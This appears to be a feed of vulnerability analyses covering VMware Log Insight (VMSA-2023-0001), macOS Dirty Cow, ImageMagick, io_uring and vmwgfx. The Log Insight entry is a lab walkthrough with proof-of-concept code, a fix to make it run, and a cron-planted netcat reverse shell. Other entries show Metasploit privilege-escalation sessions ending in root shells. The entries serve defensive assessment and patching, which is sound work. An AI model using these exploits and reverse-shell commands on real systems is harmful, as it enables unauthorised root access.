Activity Feed
Technical Analysis
On 31 January 2023, security researcher James Horman
and team from Horizon3.ai
published a Technical Deep Dive on vulnerabilities that exist in VMware vRealize Log Insight
and how to exploit those to get unauthenticated remote access to the application. Please read the blog VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive for all the technical details.
What makes this use case particular interested is the chaining of multiple vulnerabilities to achieve the unauthenticated RCE.
Basically there are four vulnerabilities that are published in the VMware VMSA-2023-0001 security disclosure:
CVE-2022-31706
: VMware vRealize Log Insight Directory Traversal Vulnerability
CVE-2022-31704
: VMware vRealize Log Insight broken Access Control Vulnerability
CVE-2022-31710
: VMware vRealize Log Insight Deserialization Vulnerability
CVE-2022-31711
: VMware vRealize Log Insight Information Disclosure Vulnerability
The analysis shows that three vulnerabilities CVE-2022-31706
, CVE-2022-31704
and CVE-2022-31711
are chained to achieve the RCE.
In a nutshell:
CVE-2022-31704
is used to gain unauthorized access to theApache Thrift
server to execute commands.Apache Thrift
is a RPC framework that allows client/server communication and is typically used to establish communication between components of the system.
- The
Apache Thrift
server in the VMware vRealize Log Insight application is vulnerable and can be accessed with a client to execute specific commands defined in the framework.
- In this scenario, two RPC commands are being exploited,
remotePakDownloadCommand
andpakUpgradeCommand
that allows for an unauthenticated upload of a malicious PAK file with an attached payload that can be extracted to any place on the filesystem usingCVE-2022-31706
that allows for Directory Traversal.
- Last but not least, the
remotePakDownloadCommand
requires a node token to work. A node token is aguid
that is unique per instance of Log Insight. This information is not readily available to an unauthenticated user. However, there are variousThrift
RPC commands that leak the node token includinggetConfig
andgetHealthStatus
, which links back to the thirdCVE-2022-31711
– VMware vRealize Log Insight Information Disclosure Vulnerability.
Now let’s see in real-life practice, how this vulnerability works…
First we need install a vulnerable instance of VMware vRealize Log Insight, which you can download from this link.
You need to be registered as a customer or you can apply for a trial license before you can download the OVA.
Import the OVA in your favorite hypervisor application. I am using Oracle VirtualBox.
Please allocate enough memory and CPU (minimal 4 GB and 2 vCPU) otherwise your appliance will be dead slow and the exploit will fail due to lack of space in the /tmp
directory.
Go thru the setup of the appliance. This is all very straight forward.
If you have the appliance running, go to the POC at Github that has been created by the Horizon3.ai
team.
Clone the repository.
Before you start executing the exploit, please install Thrift
python support.
# pip3 install thrift
and install the thrift-compiler
.
Not needed for the exploit to work but it gives you the ability to generate thrift modules for other languages such as ruby
.
# apt install thrift-compiler
The last thing that you need to do is to correct a small typo that the guys from Horizon3.ai
made in their code.
Yeah, everybody makes mistakes, even these guys ;–)
Open VMSA-2023-0001.py
with your favorite editor and go to the section below.
def remote_pak_download(client, node_token, http_server_address, http_server_port): command = Command() command.commandType = 9 download_command = RemotePakDownloadCommand() download_command.sourceNodeToken = node_token # The remote system does not return an error if this url is incorrect. # It just silently fails download_command.requestUrl = f"http://{http_server_address}:{http_server_port}/exploit.tar" download_command.fileName = "exploit.pak" command.remotePakDownloadCommand = download_command
Change download_command.fileName = "exploit"
to download_command.fileName = "exploit.pak"
and save the file.
Now we are ready to run the exploit against our installed target.
- The exploit will gain access by obtaining the token.
- Next, it will create a malicious PAK file with the payload attached that is a crontab file with a
netcat
command connecting back to your system.
- PAK file gets upload and extracted using the vulnerable
Apache Thrift
server running on the Log Insight server.
- Run a
netcat
listener on your system to catch thenetcat
connection from the target system triggered by thecron
daemon after successful exploitation.
# python3 ./VMSA-2023-0001.py --target_address 192.168.100.92 --http_server_address 192.168.100.7 --http_server_port 1981 --payload_file payload --payload_path /etc/cron.d/exploit [+] Using CVE-2022-31711 to leak node token [+] Found node token: 8984be67-2394-4da1-bf87-2635d558329d [+] Using CVE-2022-31704 to trigger malicious file download 192.168.100.92 - - [03/Feb/2023 17:19:02] "GET /exploit.tar HTTP/1.1" 200 - [+] File successfully downloaded [+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell [+] Payload successfully delivered # nc -lnvp 8888 listening on [any] 8888 ... connect to [192.168.100.7] from (UNKNOWN) [192.168.100.92] 42746 uname -a Linux localhost 4.19.245-1.ph3 #1-photon SMP Thu Jun 2 02:30:39 UTC 2022 x86_64 GNU/Linux whoami root cat /etc/issue VMware vRealize Log Insight cat /etc/photon-release VMware Photon OS 3.0 PHOTON_BUILD_NUMBER=05f9d3d8d
If you login into the appliance, you can find the exploit.pak
in the /tmp
directory and the a cron file exploit
created in the /etc/cron.d
directory.
If you check the contents of the PAK file, you will see the ../../etc/crond.d/exploit
file with the directory traversal.
root@localhost [ ~ ]# ls -l /tmp/*.pak -rw-r--r-- 1 root root 122880 Feb 3 17:18 /tmp/exploit.pak root@localhost [ ~ ]# ls -l /etc/cron.d/exploit -rw-r--r-- 1 root root 51 Feb 3 12:24 /etc/cron.d/exploit root@localhost [ ~ ]# cat /etc/cron.d/exploit * * * * * root nc -e /bin/bash 192.168.100.7 8888 root@localhost [ ~ ]# tar -tvf/tmp/exploit.pak -rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-image-8.10.2-21145187.rpm -rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-driver -rw-r--r-- root/root 35768 2023-02-03 09:10 eula.txt -rw-r--r-- root/root 1926 2023-02-03 09:10 VMware-vRealize-Log-Insight.cert -rw-r--r-- root/root 1790 2023-02-03 09:10 VMware-vRealize-Log-Insight.mf tar: Removing leading `../../' from member names -rw-r--r-- root/root 51 2023-02-03 12:24 ../../etc/cron.d/exploit
The example above show that the exploit is pretty simple to weaponize and execute, however there is a low probability of exploitation in the wild.
The main reason is that VMware vRealize Log Insight
is typically not exposed to the public Internet and the Thrift
RPC ports 16520
through 16580
should be accessible for the exploit to work.
But from the inside, it is of course a very attractive target to exploit because it has tons of nice information on the network and servers ready to be disclosed to an attacker.
Mitigation
Please update VMware vRealize Log Insight
to 8.10.2
.
References
Horizon3.ai: VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
VMware advisory
Horizon3.ai: POC
Credits
Credits goes to the security researchers below that analyzed the vulnerabilities and discovered the RCE chain.
Technical Analysis
Description
This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root. The vulnerability on linux is described as: “A race condition was found in the way the kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.”
Attacker Value & Exploitation
This issue was fixed in:
- tvOS 16.2
- macOS Monterey 12.6.2
- macOS Ventura 13.1
- macOS Big Sur 11.7.2
- iOS 15.7.2
- iPadOS 15.7.2
- iOS 16.2
- iPadOS 16.2
- watchOS 9.2.
Numerous recent versions of Apple products affected makes this quite valuable for attackers. It’s not everyday we see such a reliable LPE in current versions of macOS. The vuln requires user authentication to exploit and would pair nicely with a successful phishing attempt to compromise an entire macOS environment. A metasploit module has been released for this vuln making exploitation trivial, be sure to patch!
msf6 exploit(osx/local/mac_dirty_cow) > run [*] Started reverse TCP handler on 172.16.199.1:4446 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Writing '/tmp/.wNDx86' (17204 bytes) ... [*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ... [*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro' [*] Exploit result: Testing for 10 seconds... RO mapping was modified [*] Running cmd: echo '/tmp/.wNDx86 & disown' | su [*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u' [*] Exploit result: Testing for 10 seconds... RO mapping was modified [+] Deleted /tmp/.wNDx86 [+] Deleted /tmp/.aclP0u [+] Deleted /tmp/.DfoZanro [+] Deleted /tmp/.TKIGnTw0l [*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500 options /bin/sh: line 29: options: command not found id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1) uname -a Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64
- News Article or Blog (https://www.metabaseq.com/imagemagick-zero-days/)
Technical Analysis
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure by injecting a malicious PNG file.
“A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.”
At risk
ImageMagick 7.1.0-49
Mitigation
Patch to version 7.1.0-52 or higher
Technical Analysis
Description
This vulnerability exists in linux kernel’s io_uring implementation. This vuln allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges in order to spawn a root shell.
Attacker Value & Exploitation
Github user, @jvoisin explained, user @minipli-oss, wrote a neat exploit for CVE-2022-1043, and it has the following advantages over your everyday Linux LPE:
- No hardcoded offsets
- No ROP
- Architecture-agnostic-ish
- Bypasses all existing mitigations, even out-of-kernel-ones like grsecurity (for version older than the exploit of course, since this class of vulnerabilities is now mitigated there) and LKRG.
The only drawback is that it only works on v5.12-rc3 to v5.14-rc7 a fairly small subset of the linux kernel.
If the system is vulnerable, exploitation is trivial. The neat, aforementioned exploit has been integrated into the Metasploit making getting a root shell a piece of cake:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 username=msfuser password=notpassword [*] 172.16.199.132:22 - Starting bruteforce [+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ' [*] SSH session 1 opened (172.16.199.1:60829 -> 172.16.199.132:22) at 2023-02-01 10:59:16 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/cve_2022_1043_io_uring_priv_esc [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set session 1 session => 1 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lport 4447 lport => 4447 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > run [!] SESSION may not be compatible with this module: [!] * incompatible session architecture: [*] Started reverse TCP handler on 172.16.199.1:4447 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. > 1 CPU required, detected: 2 [*] Writing '/tmp/.5Z1IxJt0' (282 bytes) ... [*] Launching exploit... [*] Sending stage (3045348 bytes) to 172.16.199.132 [+] Deleted /tmp/.5Z1IxJt0 [+] Deleted /tmp/.qfp5AH76BB [*] Meterpreter session 2 opened (172.16.199.1:4447 -> 172.16.199.132:49236) at 2023-02-01 10:59:51 -0500 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 172.16.199.132 OS : Ubuntu 22.04 (Linux 5.13.12-051312-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux
Defensive Suggestions
Not much to say here other don’t run a vulnerable kernel version, patch!
Technical Analysis
Description
This vulnerability exploits linux priv esc against VMWare virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMWare driver bug. Specifically, a use-after-free flaw was found in the Linux kernel’s vmw_execbuf_copy_fence_user
function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
in vmwgfx
which allows an authenticated user to escalate privileges and spawn a root shell.
Attacker Value & Exploitability
Linux kernel 4.14 was released 12 November 2017 while 5.17 was released 20 March 2022. Although this vulnerability only affects VMware virtual machines I would expect the attack surface to be rather large given the wide range of kernels affected – about 4.5 years of linux kernel releases.
Exploitability requires user level privileges however once those are obtained exploitation is trivial given the metasploit module written to exploit this vulnerability. Simply get a user session and run the exploit as seen demonstrated below:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword [*] 172.16.199.132:22 - Starting bruteforce [+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ' [*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445 [!] SESSION may not be compatible with this module: [!] * incompatible session architecture: [*] Started reverse TCP handler on 172.16.199.1:4445 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. vmwgfx installed [+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin [*] Uploading payload to /tmp/.6ntizxlWd8 [*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ... [*] Launching exploit... [*] Sending stage (3045348 bytes) to 172.16.199.132 [+] Deleted /tmp/.oWt34mDG4b [*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500 [*] Replacing trojaned /bin/chfn with original meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 172.16.199.132 OS : Ubuntu 22.04 (Linux 5.13.12-051312-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter >
Defensive Suggestions
In order to protect yourself against exploitation of this vulnerability, ensure your linux VM kernel’s are up to date, and are only connected to the network where necessary.
If you’re absolutely unable to upgrade the kernel of a vulnerable machine it is possible to prevent the vulnerable kernel module from loading, RedHat demonstrates how to do that here: https://access.redhat.com/solutions/41278. However, this is a bandaid fix and promotes poor security posture, update the kernel whenever possible.
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)